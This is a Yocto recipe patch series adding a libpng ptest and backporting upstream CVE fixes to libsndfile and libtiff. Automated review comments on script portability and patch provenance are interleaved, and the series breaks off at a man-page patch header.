diff --git a/meta/recipes-multimedia/libpng/files/run-ptest b/meta/recipes-multimedia/libpng/files/run-ptest
new file mode 100644
index 0000000000..9ab5d0c1f4
--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -eux
+
+./pngfix pngtest.png &> log.txt 2>&1
+
+if grep -i "OK" log.txt 2>&1 ; then
+ echo "PASS: pngfix passed"
+else
+ echo "FAIL: pngfix failed"
+fi
+rm -f log.txt
+
+./pngtest pngtest.png &> log.txt 2>&1
+
+if grep -i "PASS" log.txt 2>&1 ; then
+ echo "PASS: pngtest passed"
+else
+ echo "FAIL: pngtest failed"
+fi
+rm -f log.txt
+
+for i in pngstest timepng; do
+ if "./${i}" pngtest.png 2>&1; then
+ echo "PASS: $i"
+ else
+ echo "FAIL: $i"
+ fi
+done
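Review bot: The script runs under `#!/bin/sh` but redirects with `&> log.txt 2>&1`, and `&>` is a bash extension; a POSIX shell without it parses the line as a background job followed by an empty redirection, so `log.txt` can be empty or still being written when `grep` reads it. `./pngfix pngtest.png > log.txt 2>&1` (and the same for `./pngtest`) is portable. In shells that do accept `&>`, `set -e` ends the script as soon as `./pngfix` or `./pngtest` exits non-zero, before any `FAIL:` line is printed, so later tests are never reported. Testing the command directly in the `if`, as the final loop already does, avoids that.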
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
SUMMARY = "PNG image format decoding library"
+DESCRIPTION = "An open source project to develop and maintain the reference \
+library for use in applications that read, create, and manipulate PNG \
+(Portable Network Graphics) raster image files. "
HOMEPAGE = "http://www.libpng.org/"
SECTION = "libs"
LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
LIBV = "16"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz"
+SRC_URI = "\
+ ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
+ file://run-ptest \
+ "
SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
-inherit autotools binconfig-disabled pkgconfig
+inherit autotools binconfig-disabled pkgconfig ptest
# Work around missing symbols
EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
# CVE-2019-17371 is actually a memory leak in gif2png 2.x
CVE_CHECK_WHITELIST += "CVE-2019-17371"
+
+do_install_ptest() {
+ install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
+}
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
new file mode 100644
index 0000000000..b42d564b4b
--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
+Index: libsamplerate-0.1.8/configure.ac
+===================================================================
+--- libsamplerate-0.1.8.orig/configure.ac
++++ libsamplerate-0.1.8/configure.ac
+@@ -53,7 +53,7 @@ AC_PROG_LN_S
+ # 6. If any interfaces have been removed since the last public release, then set age
+ # to 0.
+
+-SHARED_VERSION_INFO="1:8:1"
++SHARED_VERSION_INFO="1:9:1"
+
+
+
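Review bot: This patch file starts directly at `Index:` with no description, `Upstream-Status:` or `Signed-off-by:` line, unlike the other patches added in this commit. A short header explaining why `SHARED_VERSION_INFO` moves from `1:8:1` to `1:9:1`, together with `Upstream-Status: <status>` and a sign-off, would record where the change came from and whether it can be dropped on the next upgrade.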
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
SUMMARY = "Audio Sample Rate Conversion library"
+DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
HOMEPAGE = "http://www.mega-nerd.com/SRC/"
SECTION = "libs"
LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
file://0001-configure.ac-improve-alsa-handling.patch \
+ file://shared_version_info.patch \
"
SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
new file mode 100644
index 0000000000..6354f856cb
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
+From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Wed, 17 Feb 2021 23:21:48 +0000
+Subject: [PATCH 1/2] wavlike: Fix incorrect size check
+
+The SF_CART_INFO_16K struct has an additional 4 byte field to hold
+the size of 'tag_text' which the file header doesn't, so don't
+include it as part of the check when looking for the max length.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/wavlike.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: libsndfile-1.0.28/src/wavlike.c
+===================================================================
+--- libsndfile-1.0.28.orig/src/wavlike.c
++++ libsndfile-1.0.28/src/wavlike.c
+@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
+ return 0 ;
+ } ;
+
+- if (chunksize >= sizeof (SF_CART_INFO_16K))
++ /*
++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
++ ** of the chunk, so don't include it in the size check.
++ */
++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
+ { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
+ psf_binheader_readf (psf, "j", chunksize) ;
+ return 0 ;
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
new file mode 100644
index 0000000000..d6b03d7d4d
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
+From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Thu, 18 Feb 2021 21:52:09 +0000
+Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
+
+'blockalign' is the size of a block, and each block contains 7 samples
+per channel as part of the preamble, so check against 'samplesperblock'
+rather than 'blockalign'. Also add an additional check that the block
+is big enough to hold the samples it claims to hold.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/ms_adpcm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
+index 5e8f1a31..a21cb994 100644
+--- a/src/ms_adpcm.c
++++ b/src/ms_adpcm.c
+@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock)
+ if (psf->file.mode == SFM_WRITE)
+ samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
+
+- if (blockalign < 7 * psf->sf.channels)
+- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
++ /* There's 7 samples per channel in the preamble of each block */
++ if (samplesperblock < 7 * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
++ return SFE_INTERNAL ;
++ } ;
++
++ if (2 * blockalign < samplesperblock * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
+ return SFE_INTERNAL ;
+ } ;
+
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
new file mode 100644
index 0000000000..f7ae82588f
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
+From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
+From: yuan <ssspeed00@gmail.com>
+Date: Tue, 20 Apr 2021 16:16:32 +0800
+Subject: [PATCH] flac: Fix improper buffer reusing (#732)
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
+CVE: CVE-2021-4156
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/flac.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/flac.c b/src/flac.c
+index 0be82ac..4fa5cfa 100644
+--- a/src/flac.c
++++ b/src/flac.c
+@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
+ /* Decode some more. */
+ while (pflac->pos < pflac->len)
+ { if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
++ { psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
++ /* Current frame is busted, so NULL the pointer. */
++ pflac->frame = NULL ;
+ break ;
++ } ;
+ state = FLAC__stream_decoder_get_state (pflac->fsd) ;
+ if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
+ { psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
+--
+2.40.1
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
new file mode 100644
index 0000000000..e22b4e9389
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
+From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
+From: Alex Stewart <alex.stewart@ni.com>
+Date: Tue, 10 Oct 2023 16:10:34 -0400
+Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
+
+The clang sanitizer warns of a possible signed integer overflow when
+calculating the `dataend` value in `mat4_read_header()`.
+
+```
+src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
+src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
+```
+
+Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
+`dataend` before performing the calculation, to avoid the issue.
+
+CVE: CVE-2022-33065
+Fixes: https://github.com/libsndfile/libsndfile/issues/789
+Fixes: https://github.com/libsndfile/libsndfile/issues/833
+
+Signed-off-by: Alex Stewart <alex.stewart@ni.com>
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
+CVE: CVE-2022-33065
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/mat4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mat4.c b/src/mat4.c
+index 3c73680..e2f98b7 100644
+--- a/src/mat4.c
++++ b/src/mat4.c
+@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
+ psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
+ }
+ else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
+- psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
++ psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
+
+ psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
+
+--
+2.40.1
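Review bot: The `CVE: CVE-2022-33065` tag marks the CVE as handled, yet the only code change in this patch is the single `dataend` line in `mat4_read_header()`; the subject says "mat4/mat5" and nothing in src/mat5.c is touched. If the upstream fix for this CVE spans more commits than 0754562e (worth checking against the two linked issues, #789 and #833), the remaining ones need backporting too, otherwise the tag hides residual exposure from CVE scanning. If the partial backport is intentional, I would say so in the header, e.g. `Comment: only the mat4.c commit of the upstream series is backported`. `mat4_read_header` continues outside the inner hunk, so the other arithmetic on `rows`/`cols` cannot be checked from here.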
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
SUMMARY = "Audio format Conversion library"
+DESCRIPTION = "Library for reading and writing files containing sampled \
+sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
+one standard library interface."
HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
AUTHOR = "Erik de Castro Lopo"
DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
file://CVE-2017-12562.patch \
file://CVE-2018-19758.patch \
file://CVE-2019-3832.patch \
- "
+ file://CVE-2021-3246_1.patch \
+ file://CVE-2021-3246_2.patch \
+ file://CVE-2022-33065.patch \
+ file://CVE-2021-4156.patch \
+ "
SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
diff --git a/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
new file mode 100644
index 0000000000..31f867e000
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
+From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 25 Jan 2022 16:25:28 +0000
+Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
+ count is required (fixes #355)
+
+CVE: CVE-2022-22844
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
+---
+ tools/tiffset.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiffset.c b/tools/tiffset.c
+index 8c9e23c5..e7a88c09 100644
+--- a/tools/tiffset.c
++++ b/tools/tiffset.c
+@@ -33,6 +33,7 @@
+ #include <string.h>
+ #include <stdlib.h>
+
++#include <stdint.h>
+ #include "tiffio.h"
+
+ static char* usageMsg[] = {
+@@ -146,9 +146,19 @@ main(int argc, char* argv[])
+
+ arg_index++;
+ if (TIFFFieldDataType(fip) == TIFF_ASCII) {
+- if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
+- fprintf( stderr, "Failed to set %s=%s\n",
+- TIFFFieldName(fip), argv[arg_index] );
++ if(TIFFFieldPassCount( fip )) {
++ size_t len;
++ len = strlen(argv[arg_index]) + 1;
++ if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
++ (uint16_t)len, argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ } else {
++ if (TIFFSetField(tiff, TIFFFieldTag(fip),
++ argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ }
+ } else if (TIFFFieldWriteCount(fip) > 0
+ || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
+ int ret = 1;
+--
+GitLab
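Review bot: The provenance recorded in this patch header does not line up: the `From` line names commit b12a0326e6064b6e0b051d1184a219877472f69b while `Upstream-Status` links to 03047a26952a82daaa0792957ce211e0aa51bc64. The patch was also hand-edited to add `#include <stdint.h>`, and the second inner hunk header still reads `-146,9 +146,19` after that one-line insertion above it. This makes the backport hard to diff against upstream. I would record the local deviation next to the status line, e.g. `Upstream-Status: Backport [<commit URL actually used>; added stdint.h include for UINT16_MAX]`, and regenerate the patch so the offsets are consistent. Separately, when `len > UINT16_MAX` the user only sees the generic `Failed to set` message, so a length rejection is indistinguishable from a library error.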
diff --git a/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..9b4724a325
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
+From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sat, 7 Mar 2020 13:21:56 +0100
+Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
+
+also uses std C EXIT_FAILURE / EXIT_SUCCESS
+see #17
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
+ 1 file changed, 24 insertions(+), 15 deletions(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index 2eb6f6c4..ef643653 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -39,6 +39,13 @@
+ #include "tiffiop.h"
+ #include "tiffio.h"
+
++#ifndef EXIT_SUCCESS
++#define EXIT_SUCCESS 0
++#endif
++#ifndef EXIT_FAILURE
++#define EXIT_FAILURE 1
++#endif
++
+ #define streq(a,b) (strcmp(a,b) == 0)
+ #define CopyField(tag, v) \
+ if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
+@@ -68,7 +75,7 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
+ switch (c) {
+ case 'b':
+ process_by_block = 1;
+@@ -86,7 +93,7 @@ main(int argc, char* argv[])
+ else if (streq(optarg, "zip"))
+ compression = COMPRESSION_DEFLATE;
+ else
+- usage(-1);
++ usage(EXIT_FAILURE);
+ break;
+
+ case 'r':
+@@ -105,17 +112,20 @@ main(int argc, char* argv[])
+ bigtiff_output = 1;
+ break;
+
++ case 'h':
++ usage(EXIT_SUCCESS);
++ /*NOTREACHED*/
+ case '?':
+- usage(0);
++ usage(EXIT_FAILURE);
+ /*NOTREACHED*/
+ }
+
+ if (argc - optind < 2)
+- usage(-1);
++ usage(EXIT_FAILURE);
+
+ out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
+ if (out == NULL)
+- return (-2);
++ return (EXIT_FAILURE);
+
+ for (; optind < argc-1; optind++) {
+ in = TIFFOpen(argv[optind], "r");
+@@ -132,7 +142,7 @@ main(int argc, char* argv[])
+ }
+ }
+ (void) TIFFClose(out);
+- return (0);
++ return (EXIT_SUCCESS);
+ }
+
+ static int
+@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != (rastersize / tile_height) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != (rastersize / rowsperstrip) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-static char* stuff[] = {
++const static char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+@@ -547,13 +557,12 @@ static char* stuff[] = {
+ static void
+ usage(int code)
+ {
+- char buf[BUFSIZ];
+ int i;
++ FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
+
+- setbuf(stderr, buf);
+- fprintf(stderr, "%s\n\n", TIFFGetVersion());
++ fprintf(out, "%s\n\n", TIFFGetVersion());
+ for (i = 0; stuff[i] != NULL; i++)
+- fprintf(stderr, "%s\n", stuff[i]);
++ fprintf(out, "%s\n", stuff[i]);
+ exit(code);
+ }
+
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..b6e1842a54
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
+From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 3 Oct 2020 18:16:27 +0200
+Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index ef643653..fbc383aa 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-const static char* stuff[] = {
++static const char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..129721ff3e
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
+From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:02:51 +0100
+Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
+
+fixes #207
+fixes #209
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+---
+CVE: CVE-2020-35521
+CVE: CVE-2020-35522
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index fbc383aa..764395f6 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
+ int process_by_block = 0; /* default is whole image at once */
+ int no_alpha = 0;
+ int bigtiff_output = 0;
++#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
++/* malloc size limit (in bytes)
++ * disabled when set to 0 */
++static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
+
+
+ static int tiffcvt(TIFF* in, TIFF* out);
+@@ -75,8 +79,11 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
+ switch (c) {
++ case 'M':
++ maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
++ break;
+ case 'b':
+ process_by_block = 1;
+ break;
+@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
+ (unsigned long)width, (unsigned long)height);
+ return 0;
+ }
++ if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
++ TIFFError(TIFFFileName(in),
++ "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
++ (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
++ return 0;
++ }
+
+ rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
+ TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
+@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
+ TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
+ CopyField(TIFFTAG_DOCUMENTNAME, stringv);
+
++ if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
++ {
++ TIFFError(TIFFFileName(in),
++ "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
++ (uint64)TIFFStripSize(in), (uint64)maxMalloc);
++ return 0;
++ }
+ if( process_by_block && TIFFIsTiled( in ) )
+ return( cvt_by_tile( in, out ) );
+ else if( process_by_block )
+@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ }
+
+ static const char* stuff[] = {
+- "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
++ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+ " zip\t\tZip/Deflate encoding",
+@@ -551,6 +571,7 @@ static const char* stuff[] = {
+ " -b (progress by block rather than as a whole image)",
+ " -n don't emit alpha component.",
+ " -8 write BigTIFF file instead of ClassicTIFF",
++ " -M set the memory allocation limit in MiB. 0 to disable limit",
+ NULL
+ };
+
+--
+GitLab
+
+
+From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:08:42 +0100
+Subject: [PATCH 2/2] tiff2rgba.1: -M option
+
+---
+ man/tiff2rgba.1 | 4 ++++
+ 1 file changed, 4 insertions(+)
+
